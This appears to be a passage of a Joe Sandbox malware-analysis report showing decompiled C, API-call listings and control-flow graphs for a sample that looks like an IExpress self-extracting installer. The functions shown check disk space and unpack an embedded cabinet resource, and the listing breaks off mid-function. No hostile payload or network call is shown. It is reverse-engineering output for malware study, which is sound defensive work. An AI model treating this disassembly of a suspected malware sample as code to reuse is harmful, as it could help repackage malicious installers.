                                                                                                                                                                                                                                            0x00325811
                                                                                                                                                                                                                                            0x00325817
                                                                                                                                                                                                                                            0x00325819
                                                                                                                                                                                                                                            0x0032581f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032581f
                                                                                                                                                                                                                                            0x00325791
                                                                                                                                                                                                                                            0x00325797
                                                                                                                                                                                                                                            0x0032579c
                                                                                                                                                                                                                                            0x0032579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003257a0
                                                                                                                                                                                                                                            0x003257a9
                                                                                                                                                                                                                                            0x003257ae
                                                                                                                                                                                                                                            0x003257b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003257b0
                                                                                                                                                                                                                                            0x0032579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325769
                                                                                                                                                                                                                                            0x00325762
                                                                                                                                                                                                                                            0x00325753
                                                                                                                                                                                                                                            0x0032574f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032572e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325864
                                                                                                                                                                                                                                            0x00325864
                                                                                                                                                                                                                                            0x00325864
                                                                                                                                                                                                                                            0x00325717
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003256c3
                                                                                                                                                                                                                                            0x003256c5
                                                                                                                                                                                                                                            0x003256c9
                                                                                                                                                                                                                                            0x003256ce
                                                                                                                                                                                                                                            0x003256d0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003256d6
                                                                                                                                                                                                                                            0x003256d6
                                                                                                                                                                                                                                            0x003256d8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: memcpy_s.MSVCRT ref: 003246E5
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 003255CF
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00325638
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0032564C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00325620
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                              • Part of subcall function 00326285: GetLastError.KERNEL32(00325BBC), ref: 00326285
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003256B9
                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0032571E
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00325737
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 003257CD
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 003257EF
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00325802
                                                                                                                                                                                                                                              • Part of subcall function 00322630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00322654
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00325830
                                                                                                                                                                                                                                              • Part of subcall function 00326517: FindResourceA.KERNEL32(00320000,000007D6,00000005), ref: 0032652A
                                                                                                                                                                                                                                              • Part of subcall function 00326517: LoadResource.KERNEL32(00320000,00000000,?,?,00322EE8,00000000,003219E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00326538
                                                                                                                                                                                                                                              • Part of subcall function 00326517: DialogBoxIndirectParamA.USER32(00320000,00000000,00000547,003219E0,00000000), ref: 00326557
                                                                                                                                                                                                                                              • Part of subcall function 00326517: FreeResource.KERNEL32(00000000,?,?,00322EE8,00000000,003219E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00326560
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00325878
                                                                                                                                                                                                                                              • Part of subcall function 0032597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003259A8
                                                                                                                                                                                                                                              • Part of subcall function 0032597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 003259AF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                            • API String ID: 2436801531-337015389
                                                                                                                                                                                                                                            • Opcode ID: 47b785938c7cfb67ce0ab71d4db010c3bd5649dcad6790ec47c71d4713e6bc8c
                                                                                                                                                                                                                                            • Instruction ID: b3fb05eb4952f7687973059cafd562f76127d31c84fb024f7e39cdf10f017821
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47b785938c7cfb67ce0ab71d4db010c3bd5649dcad6790ec47c71d4713e6bc8c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0812971B04A349BDB33AB35BC85FEA726D9F65300F050069F986D6191EFB48FC28A50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 324 32597d-3259b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 3259bb-3259d8 call 3244b9 call 326285 324->325 326 3259dd-325a1b GetDiskFreeSpaceA 324->326 341 325c05-325c14 call 326ce0 325->341 327 325ba1-325bde memset call 326285 GetLastError FormatMessageA 326->327 328 325a21-325a4a MulDiv 326->328 338 325be3-325bfc call 3244b9 SetCurrentDirectoryA 327->338 328->327 331 325a50-325a6c GetVolumeInformationA 328->331 335 325ab5-325aca SetCurrentDirectoryA 331->335 336 325a6e-325ab0 memset call 326285 GetLastError FormatMessageA 331->336 340 325acc-325ad1 335->340 336->338 351 325c02 338->351 344 325ae2-325ae4 340->344 345 325ad3-325ad8 340->345 349 325ae6 344->349 350 325ae7-325af8 344->350 345->344 347 325ada-325ae0 345->347 347->340 347->344 349->350 353 325af9-325afb 350->353 356 325c04 351->356 354 325b05-325b08 353->354 355 325afd-325b03 353->355 357 325b20-325b27 354->357 358 325b0a-325b1b call 3244b9 354->358 355->353 355->354 356->341 360 325b52-325b5b 357->360 361 325b29-325b33 357->361 358->351 364 325b62-325b6d 360->364 361->360 363 325b35-325b50 361->363 363->364 365 325b76-325b7d 364->365 366 325b6f-325b74 364->366 368 325b83 365->368 369 325b7f-325b81 365->369 367 325b85 366->367 370 325b96-325b9f 367->370 371 325b87-325b94 call 32268b 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                            			E0032597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v788;
                                                                                                                                                                                                                                            				long _v792;
                                                                                                                                                                                                                                            				long _v796;
                                                                                                                                                                                                                                            				long _v800;
                                                                                                                                                                                                                                            				signed int _v804;
                                                                                                                                                                                                                                            				long _v808;
                                                                                                                                                                                                                                            				int _v812;
                                                                                                                                                                                                                                            				long _v816;
                                                                                                                                                                                                                                            				long _v820;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                                                                                            				signed short _t78;
                                                                                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				int _t102;
                                                                                                                                                                                                                                            				unsigned int _t103;
                                                                                                                                                                                                                                            				unsigned int _t105;
                                                                                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                                                                                            				long _t112;
                                                                                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				signed int _t119;
                                                                                                                                                                                                                                            				signed int _t120;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t114 = __edi;
                                                                                                                                                                                                                                            				_t46 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                            				_v804 = __edx;
                                                                                                                                                                                                                                            				_t118 = __ecx;
                                                                                                                                                                                                                                            				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                            				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                            				if(_t50 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					_v796 = 0;
                                                                                                                                                                                                                                            					_v792 = 0;
                                                                                                                                                                                                                                            					_v800 = 0;
                                                                                                                                                                                                                                            					_v808 = 0;
                                                                                                                                                                                                                                            					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                            					__eflags = _t55;
                                                                                                                                                                                                                                            					if(_t55 == 0) {
                                                                                                                                                                                                                                            						L29:
                                                                                                                                                                                                                                            						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            						 *0x329124 = E00326285();
                                                                                                                                                                                                                                            						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            						_t110 = 0x4b0;
                                                                                                                                                                                                                                            						L30:
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						E003244B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                            						L31:
                                                                                                                                                                                                                                            						_t66 = 0;
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						L32:
                                                                                                                                                                                                                                            						_pop(_t114);
                                                                                                                                                                                                                                            						goto L33;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                            					_v812 = _t69;
                                                                                                                                                                                                                                            					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                            					__eflags = _t116;
                                                                                                                                                                                                                                            					if(_t116 == 0) {
                                                                                                                                                                                                                                            						goto L29;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                            					__eflags = _t73;
                                                                                                                                                                                                                                            					if(_t73 != 0) {
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                            						_t101 =  &_v16;
                                                                                                                                                                                                                                            						_t111 = 6;
                                                                                                                                                                                                                                            						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                            							__eflags = _t22;
                                                                                                                                                                                                                                            							if(_t22 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                            							__eflags = _t87;
                                                                                                                                                                                                                                            							if(_t87 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *_t101 = _t87;
                                                                                                                                                                                                                                            							_t101 = _t101 + 1;
                                                                                                                                                                                                                                            							_t111 = _t111 - 1;
                                                                                                                                                                                                                                            							__eflags = _t111;
                                                                                                                                                                                                                                            							if(_t111 != 0) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t111;
                                                                                                                                                                                                                                            						if(_t111 == 0) {
                                                                                                                                                                                                                                            							_t101 = _t101 - 1;
                                                                                                                                                                                                                                            							__eflags = _t101;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t101 = 0;
                                                                                                                                                                                                                                            						_t112 = 0x200;
                                                                                                                                                                                                                                            						_t102 = _v812;
                                                                                                                                                                                                                                            						_t78 = 0;
                                                                                                                                                                                                                                            						_t118 = 8;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                            							if(_t102 == _t112) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                            							_t78 = _t78 + 1;
                                                                                                                                                                                                                                            							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            							if(_t78 < _t118) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            						if(_t78 != _t118) {
                                                                                                                                                                                                                                            							__eflags =  *0x329a34 & 0x00000008;
                                                                                                                                                                                                                                            							if(( *0x329a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                            								L20:
                                                                                                                                                                                                                                            								_t103 =  *0x329a38; // 0x0
                                                                                                                                                                                                                                            								_t110 =  *((intOrPtr*)(0x3289e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                                            								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                            								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                            									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                            									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									 *0x329124 = 0;
                                                                                                                                                                                                                                            									_t66 = 1;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t66 = E0032268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                            							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t105 =  *0x329a38; // 0x0
                                                                                                                                                                                                                                            							_t110 =  *((intOrPtr*)(0x3289e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x3289e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            							_t103 = (_t105 >> 2) +  *0x329a38;
                                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t110 = 0x4c5;
                                                                                                                                                                                                                                            						E003244B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						goto L31;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            					 *0x329124 = E00326285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            					_t110 = 0x4f9;
                                                                                                                                                                                                                                            					goto L30;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t110 = 0x4bc;
                                                                                                                                                                                                                                            					E003244B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0x329124 = E00326285();
                                                                                                                                                                                                                                            					_t66 = 0;
                                                                                                                                                                                                                                            					L33:
                                                                                                                                                                                                                                            					return E00326CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325afd
                                                                                                                                                                                                                                            0x00325aff
                                                                                                                                                                                                                                            0x00325b00
                                                                                                                                                                                                                                            0x00325b03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325b03
                                                                                                                                                                                                                                            0x00325b05
                                                                                                                                                                                                                                            0x00325b08
                                                                                                                                                                                                                                            0x00325b20
                                                                                                                                                                                                                                            0x00325b27
                                                                                                                                                                                                                                            0x00325b52
                                                                                                                                                                                                                                            0x00325b52
                                                                                                                                                                                                                                            0x00325b5b
                                                                                                                                                                                                                                            0x00325b62
                                                                                                                                                                                                                                            0x00325b6b
                                                                                                                                                                                                                                            0x00325b6d
                                                                                                                                                                                                                                            0x00325b76
                                                                                                                                                                                                                                            0x00325b7d
                                                                                                                                                                                                                                            0x00325b83
                                                                                                                                                                                                                                            0x00325b7f
                                                                                                                                                                                                                                            0x00325b7f
                                                                                                                                                                                                                                            0x00325b7f
                                                                                                                                                                                                                                            0x00325b6f
                                                                                                                                                                                                                                            0x00325b72
                                                                                                                                                                                                                                            0x00325b72
                                                                                                                                                                                                                                            0x00325b85
                                                                                                                                                                                                                                            0x00325b98
                                                                                                                                                                                                                                            0x00325b9e
                                                                                                                                                                                                                                            0x00325b87
                                                                                                                                                                                                                                            0x00325b8f
                                                                                                                                                                                                                                            0x00325b8f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325b85
                                                                                                                                                                                                                                            0x00325b29
                                                                                                                                                                                                                                            0x00325b33
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325b35
                                                                                                                                                                                                                                            0x00325b48
                                                                                                                                                                                                                                            0x00325b4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325b4a
                                                                                                                                                                                                                                            0x00325b0f
                                                                                                                                                                                                                                            0x00325b16
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325b16
                                                                                                                                                                                                                                            0x00325a7c
                                                                                                                                                                                                                                            0x00325a8a
                                                                                                                                                                                                                                            0x00325aa5
                                                                                                                                                                                                                                            0x00325aab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003259bb
                                                                                                                                                                                                                                            0x003259c0
                                                                                                                                                                                                                                            0x003259c7
                                                                                                                                                                                                                                            0x003259d1
                                                                                                                                                                                                                                            0x003259d6
                                                                                                                                                                                                                                            0x00325c05
                                                                                                                                                                                                                                            0x00325c14
                                                                                                                                                                                                                                            0x00325c14

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003259A8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 003259AF
                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00325A13
                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 00325A40
                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00325A64
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00325A7C
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00325A98
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00325AA5
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00325BFC
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                              • Part of subcall function 00326285: GetLastError.KERNEL32(00325BBC), ref: 00326285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4237285672-0
                                                                                                                                                                                                                                            • Opcode ID: daf1e2feee90dc7d821800dd3d4bf6495acc3397b252f7e445f0b34cb65a270e
                                                                                                                                                                                                                                            • Instruction ID: 16d73d2bad1105e17f44e66aad2f3b56552c2a303a90178504ad4d446e527d77
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: daf1e2feee90dc7d821800dd3d4bf6495acc3397b252f7e445f0b34cb65a270e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E7191B190062CAFEB279F64EC85FFA77ADEB48340F0440AAF405D6140EA309F858B64
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 374 324fe0-32501a call 32468f FindResourceA LoadResource LockResource 377 325020-325027 374->377 378 325161-325163 374->378 379 325057-32505e call 324efd 377->379 380 325029-325051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 325060-325077 call 3244b9 379->383 384 32507c-3250b4 379->384 380->379 388 325107-32510e 383->388 389 3250b6-3250da 384->389 390 3250e8-325104 call 3244b9 384->390 392 325110-325117 FreeResource 388->392 393 32511d-32511f 388->393 398 325106 389->398 399 3250dc 389->399 390->398 392->393 395 325121-325127 393->395 396 32513a-325141 393->396 395->396 400 325129-325135 call 3244b9 395->400 401 325143-32514a 396->401 402 32515f 396->402 398->388 405 3250e3-3250e6 399->405 400->396 401->402 404 32514c-325159 SendMessageA 401->404 402->378 404->402 405->390 405->398
                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E00324FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t9;
                                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t27;
                                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				CHAR* _t36;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t36 = "CABINET";
                                                                                                                                                                                                                                            				 *0x329144 = E0032468F(_t36, 0, 0);
                                                                                                                                                                                                                                            				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                            				 *0x329140 = _t8;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					return _t8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t9 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            				if(_t9 != 0) {
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem( *0x328584, 0x841), 5); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t10 = E00324EFD(0, 0); // executed
                                                                                                                                                                                                                                            				if(_t10 != 0) {
                                                                                                                                                                                                                                            					__imp__#20(E00324CA0, E00324CC0, E00324980, E00324A50, E00324AD0, E00324B60, E00324BC0, 1, 0x329148, _t33);
                                                                                                                                                                                                                                            					_t34 = _t10;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						_t29 =  *0x329148; // 0x0
                                                                                                                                                                                                                                            						_t24 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            						E003244B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#22(_t34, "*MEMCAB", 0x321140, 0, E00324CD0, 0, 0x329140); // executed
                                                                                                                                                                                                                                            					_t37 = _t10;
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                            					if(_t10 != 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            					E003244B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_t12 =  *0x329140; // 0x0
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						FreeResource(_t12);
                                                                                                                                                                                                                                            						 *0x329140 = 0;
